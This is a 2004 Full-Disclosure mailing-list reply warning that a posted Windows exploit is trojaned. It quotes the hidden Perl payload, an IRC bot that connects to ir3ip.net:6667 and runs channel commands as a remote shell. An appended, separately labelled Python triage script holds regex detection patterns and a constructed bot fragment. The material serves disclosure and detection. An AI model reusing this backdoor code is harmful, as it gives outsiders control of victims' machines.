Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
- From: Deigo Dude <deigodude@xxxxxxx>
- Date: Wed, 03 Nov 2004 16:54:48 -0500
>>Do I need to say more :D
You sure do. For example, explain the following in your code, and
why it makes /tmp/hi (/var/tmp/hi) and then executes it, and why it contains
this code:
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit if fork;use
ket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock
"USER k +i
k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last
if $mode=
="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK
t $sock "JOIN $chan\nPRIVMSG $chan :Hi\n";while(<$sock>){if (/^PING
t $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
:\w]*:[^ :\w
]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG
$chan :$
_\n";sleep 1;}}}#/tmp/hi
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
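Added example, not part of the original message or of the script quoted in it: a static triage check a reviewer could run over a downloaded "exploit" before executing it, keyed to the traits visible in the quoted Perl (TCP socket to an IRC port, `exit if fork`, a cleared TERM handler, IRC verbs, and backticks applied to received text). The regexes, the `triage` function and both sample strings are constructed for illustration, and the samples are fragments rather than complete programs.

```python
import re

# Traits visible in the script quoted above; names and regexes are assumptions of this example.
TRAITS = {
    "tcp_socket":   re.compile(r"IO::Socket::INET|\bsocket\s*\("),
    "irc_port":     re.compile(r":666[0-9]\b|PeerPort\s*=>\s*666[0-9]\b"),
    "daemonizes":   re.compile(r"\bexit\s+if\s+fork\b|\bfork\s*(\(\s*\))?\s*(&&|and)\s*exit\b"),
    "ignores_term": re.compile(r"\$SIG\{\s*'?TERM'?\s*\}"),
    "runs_input":   re.compile(r"`[^`\n]*\$[^`\n]*`|\b(?:system|exec|eval)\s*\(?\s*\$"),
}
IRC_VERBS = re.compile(r"\b(NICK|USER|JOIN|PRIVMSG|PONG)\b")

def triage(source: str) -> dict:
    """Report which traits a script shows and whether they combine into a remote shell."""
    hits = {name for name, rx in TRAITS.items() if rx.search(source)}
    verbs = set(IRC_VERBS.findall(source))
    # An IRC client alone is not a finding: it needs a socket/port plus several protocol verbs.
    speaks_irc = len(verbs) >= 3 and bool(hits & {"tcp_socket", "irc_port"})
    return {
        "traits": sorted(hits),
        "irc_verbs": sorted(verbs),
        "speaks_irc": speaks_irc,
        # The dangerous combination: IRC client that also executes variable input.
        "remote_shell": speaks_irc and "runs_input" in hits,
    }

# Constructed fragment carrying the same traits as the quoted /tmp/hi script.
BOT_FRAGMENT = r'''
$SIG{TERM}={};exit if fork;
$sock = IO::Socket::INET->new($server.":6667")||exit;
print $sock "NICK $nick\n";
print $sock "JOIN $chan\n";
# ... reads a line from the channel, then:
$_=`$_`;
print $sock "PRIVMSG $chan :$_\n";
'''

# Constructed benign counter-case: an IRC logger that never executes what it reads.
IRC_LOGGER = r'''
my $sock = IO::Socket::INET->new(PeerAddr => "irc.example.invalid", PeerPort => 6667) or die;
print $sock "NICK logbot\r\nUSER logbot 0 * :log\r\nJOIN #ops\r\n";
while (<$sock>) { print $sock "PONG $1\r\n" if /^PING (.*)/; print LOG $_ if /PRIVMSG/; }
'''

if __name__ == "__main__":
    for name, text in (("bot fragment", BOT_FRAGMENT), ("irc logger", IRC_LOGGER)):
        print(name, triage(text))
```

A hit on `remote_shell` is a reason to read the file by hand before running it; a miss proves nothing, since an embedded script can be encoded or packed.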